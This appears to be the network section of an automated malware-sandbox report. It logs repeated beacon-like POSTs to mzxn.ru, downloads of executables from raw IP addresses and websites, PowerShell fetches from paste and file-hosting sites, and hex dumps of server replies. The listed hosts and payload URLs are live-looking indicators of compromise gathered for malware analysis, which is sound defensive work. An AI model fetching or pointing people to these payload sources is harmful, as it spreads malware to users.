Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fpsqjgbmrba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fnhraoopptocahym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uffvfrhcnqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mbsrmkgaclwdahn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hkiilqyskldjgofe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://brdcuglswdjuibu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jqxhoujpotsnhua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://igndfrdsspnvoxyl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://snlibtbsitsby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://srmyuatrmfavkh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yepbkxlonjp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rqsjxbmjbmnltw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oydnksqvapytmm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: mzxn.ru

Source: unknown

HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212

Source: global traffic	DNS traffic detected: DNS query: mzxn.ru
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic	DNS traffic detected: DNS query: rentry.co
Source: global traffic	DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: liernessfornicsa.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 